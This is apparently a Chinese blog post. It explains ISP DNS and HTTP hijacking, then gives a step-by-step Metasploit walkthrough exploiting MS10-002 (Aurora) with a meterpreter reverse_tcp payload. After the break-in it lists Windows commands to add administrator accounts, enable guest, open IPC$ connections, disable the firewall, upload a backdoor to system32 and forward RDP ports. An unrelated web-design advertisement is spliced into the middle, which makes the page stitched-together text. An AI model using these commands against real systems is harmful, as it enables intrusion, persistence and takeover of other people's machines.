DNS劫持:用戶上網(wǎng)的DNS服務(wù)器都是運營商分配的，所以，在這個節(jié)點上，運營商可以為所欲為
例如:訪問一個網(wǎng)站，輸入域名，正常DNS服務(wù)器返回該域名的IP，而DNS劫持后，會返回一個運營商額中間服務(wù)器IP，該訪問服務(wù)器會一致性的返回302，讓用戶瀏覽器跳轉(zhuǎn)到預(yù)處理好的帶廣告的網(wǎng)頁，在該網(wǎng)頁中再通過iframe打開用戶原來訪問的地址

HTTP劫持:
在運營商的路由器節(jié)點上，設(shè)置協(xié)議檢測，一旦發(fā)現(xiàn)是http請求，而且是html類型請求，則攔截處理。后續(xù)做法往往分為2種、1種是DNS劫持返回302讓用戶瀏覽器跳轉(zhuǎn)到另外的地址，還有1種是在服務(wù)器返回的HTML數(shù)據(jù)中插入js或dom節(jié)點廣告

在蓬萊等地區(qū)，都構(gòu)建了全面的區(qū)域性戰(zhàn)略布局，加強(qiáng)發(fā)展的系統(tǒng)性、市場前瞻性、產(chǎn)品創(chuàng)新能力，以專注、極致的服務(wù)理念，為客戶提供網(wǎng)站設(shè)計制作、網(wǎng)站建設(shè) 網(wǎng)站設(shè)計制作定制網(wǎng)站建設(shè),公司網(wǎng)站建設(shè),企業(yè)網(wǎng)站建設(shè),品牌網(wǎng)站制作,成都全網(wǎng)營銷推廣,成都外貿(mào)網(wǎng)站建設(shè)公司,蓬萊網(wǎng)站建設(shè)費用合理。

保證網(wǎng)絡(luò)連通性，配置網(wǎng)絡(luò)地址

第一次使用msfconsole，開啟內(nèi)建的數(shù)據(jù)庫PostgreSQL和metasplote

開啟PostgreSQL:  service postgresql start
開啟metasploit:  service metasploit start

 root@kali:~ps -e|grep 5432(確保postgresql服務(wù)開啟，默認(rèn)占用端口是5432)

root@kali:~# msfconsole

查找10-002漏洞模塊 search 10-002

use exploit/windows/browser/ms10_002_aurora 進(jìn)行漏洞***

set payload windows/meterpreter/reverse_tcp 定義***載荷
set lhost 192.168.48.123 定義本機(jī)地址
set URIPATH / 定義url的后綴（這里我只設(shè)置了一個/）
exploit 開發(fā)

在***主機(jī)打開目標(biāo)網(wǎng)站http://192.168.48.123:8080/

sessions -i 1 打開連接會話

session 查看已經(jīng)成功獲取的會話，使用session -i 連接到指定序號的meterpreter會話已繼續(xù)利用

通過shell 獲取目標(biāo)主機(jī)的遠(yuǎn)程命令行

通過DOS創(chuàng)建賬號與密碼

Windows常用命令

1、net localgroup administrators    用戶名 密碼 /add（將用戶加到管理員，使其擁有管理權(quán)限）
2、net user guest /active:yes (激活guest用戶)
3、net user guest 12345 （修改guest密碼為12345）
4、net user （查看賬號屬性）
5、net start  (查看開啟了那些服務(wù))
6、net time \\ 目標(biāo)ip   （查看對方時間）
7、net view (查看局域網(wǎng)中開啟了那些共享)
8、net share  (查看本地開啟的那些共享)
9、net share C$/del        (刪除c盤默認(rèn)共享)
10、Copy xx.exe\\ip\admin$\System32 （將當(dāng)前xx.exe復(fù)制到對方Admin$共享的System32目錄內(nèi)）
11、sc config tlnesvr start= auto (修改telnet服務(wù)的啟動方式為自動，auto前面有一個空格)
12、net stop sharedaccess（關(guān)閉系統(tǒng)自帶的防火墻）
13、net send IP 消息（利用messenger服務(wù)向目標(biāo)IP發(fā)送消息）
14、tasklist（查看進(jìn)程）
15、taskkill （結(jié)束進(jìn)程）ntsd     強(qiáng)制結(jié)束進(jìn)程
16、services.msc   進(jìn)入本地計算機(jī)的服務(wù)

17、net use \\ip\ipc$ “” /user (建立空IPC鏈接)
18、net use \\ip\ipc$ “密碼” /user:”用戶名”（建立IPC非空連接，非空鏈接就是需要賬戶和密碼）
19、net use \\ip\ipc$ /del   (刪除ipc空連接)
20、net use z: \\127.0.0.1\c$  (映射目標(biāo)主機(jī)磁盤c盤到本地磁盤z盤)

遠(yuǎn)程連接該系統(tǒng)

rdesktop  -u  administrator  -p  123  192.168.48.100:3389

getuid查看meterpreter注入到目標(biāo)主機(jī)的進(jìn)程所屬用戶
upload命令上傳文件到目標(biāo)主機(jī)，例如把后門程序setup.exe傳到目標(biāo)主機(jī)system32目錄下
upload  setup.exe  C:\\windows\\system32\
portfwd 端口轉(zhuǎn)發(fā)
例如目標(biāo)主機(jī)上開啟了3389，但是只允許特定IP訪問，***主機(jī)無法連接，可以使用portfwd命令把目標(biāo)主機(jī)的3389端口轉(zhuǎn)發(fā)到其他端口打開
例如：portfwd  add -l  1122 -p 3389 -r  192.168.48.100
把目標(biāo)主機(jī)192.168.48.100的3389端口轉(zhuǎn)發(fā)到1122端口
這是只需要連接目標(biāo)的1122端口就可以打開遠(yuǎn)程桌面了
rdesktop  -u  administrator  -p  123456  192.168.48.100:1122
sysinfo查看目標(biāo)主機(jī)系統(tǒng)信息
ps 查看目標(biāo)主機(jī)上運行的進(jìn)程信息，結(jié)合migrate使用